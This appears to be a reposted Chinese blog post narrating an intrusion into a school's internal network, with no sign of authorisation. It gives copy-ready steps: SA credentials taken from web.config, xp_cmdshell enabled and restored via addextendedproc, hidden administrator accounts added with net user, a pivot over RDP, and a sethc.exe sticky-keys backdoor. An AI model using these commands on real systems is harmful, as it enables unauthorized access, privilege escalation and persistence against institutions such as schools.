渗透学校计算机室,内网渗透技术之渗透学校内网过程 -电脑资料

本文详细描述了一次内网渗透的过程,从发现网站存在MSSQL数据库权限入手,通过aspxspy工具进行数据库连接,获取SA权限并执行系统命令。在获取服务器控制权后,遇到无法连接其他内网SQL服务器的问题,最终通过3389远程桌面解决,并成功渗透到其他内网机器。文章强调了内网渗透需要细心研究和理解每一个细节。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

本文重点讲述内网渗透提权部分,对于WEBSHELL不在描述,

从本站的角度来看,存在MSSQL、MYSQL支持ASPX和PHP可以说权限够大的了。

先来看看目录能穷举出来哪些东西。

先看程序目录,很平常么。没现有SU和MYSQL之类的信息。

E:盘可以浏览

F:盘可以浏览

本站ASPX 类型网站,使用的是MSSQL数据库。显示密码不是最高权限的用户,就是是个DB用户提权也不能马上到手。

再翻翻别的站点,目录可以浏览一个个找吧。

发现一个目录web.config有SA用户

连接数据库信息:

Source=gzzx;Initial Catalog=SMSCenter;Persist Security Info=True;User ID=sa;Password=****

打开aspxspy,使用database连接功能。

登录成功,显示SA看来应该没有降权。

连接状态是MSSQL 2005,要先启xp_cmdshell

接着执行下命令"whoami"

good,system 权限,下面就是添加一个账号了。

Exec master.dbo.xp_cmdshell 'net user admin **** /add'

Exec master.dbo.xp_cmdshell 'net localgroup administrators admin /add'

再看下3389端口是否开启

Exec master.dbo.xp_cmdshell 'netstat -ano'

OK,状态正常。

Exec master.dbo.xp_cmdshell 'ipconfig /all'显示配置是内网IP

通过域名解析到的IP连接3389,可以连接。

说明管理做了端口映射,这就不要转发端口了。省了很多功夫!

这才拿到了一台服务器的权限,从网站的SQL连接上不难发现内网还有SQL服务器。

渗透继续……

内网IP为200,同样是MSSQL SA权限。

再利用aspxspy 数据库连接,

郁闷的事情发生了,不能连接。

[DBNETLIB][ConnectionOpen (Connect()).]SQL Server 不存在或拒绝访问,内网渗透技术之渗透学校内网过程》(https://www.unjs.com)。

按道理讲数据库能使用的情况下应该可以成功连接上的,难道没有配置TCP/IP访问数据库?疑问产生了,无耐之下通过3389上到服务器上来试试。服务器安装了MSSQL,有查询分析器和企业管理器。这又成了我们的工具。呵呵!

SQL分析器连接之,仍然无法连接。

先测试下所在的MSSQL服务器机器的存在性。

成功响应,说明服务器存在。

运行mstsc试着3389连接下,显示了一个xp的界面。比较郁闷耶。

试下名称解析服务。

点击浏览一看,这么多MSSQL服务器名还真不知道哪台是的。观察下发现200和IP200的机器有些相近。输入SA及密码。

成功返回查询窗口。试下xp_cmdshell

发现不存在,恢复之

Use master dbcc addextendedproc('xp_cmdshell','xplog70.dll')

OK!

执行命令"whoami",虽然XP不支持whoami命令。

exec xp_cmdshell 'net user 123 123 /add'

提示系统错误。不是没权限添加。。不明真像了。

思路:开了3389可以用sethc.exe 替换来。

exec xp_cmdshell 'copy c:\windwos\explorer.exe c:\windows\system32\sethc.exe'替换之?

问题又来了,提示磁盘文件不足。

利用xp_dirtree查看下C盘

EXEC MASTER..XP_dirtree 'c:\',1,1

列出文件目录,删除一个数据库的备份

再执行exec xp_cmdshell 'copy c:\windwos\explorer.exe c:\windows\system32\sethc.exe'

提示一个文件被复制,说明成功。3389 5次shift未弹出。

再试下

exec xp_cmdshell 'net user 123 123 /add' 提示成功。原来开始是空间不足导致的系统错误啊。真像揭开!

exec xp_cmdshell 'net localgroup administrator 123 /add'

3389登录之。

exec xp_cmdshell 'net user 123 /del'删除用户

内网还存在很多机器,此次渗透就此结束。

总结:内网渗透技术并非难以琢磨,细心研究就能发现每个细节与步骤都能激起灵感。内网从端口转发到外部连接,再从3389登录内部3389 跟跳板技术差不多

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值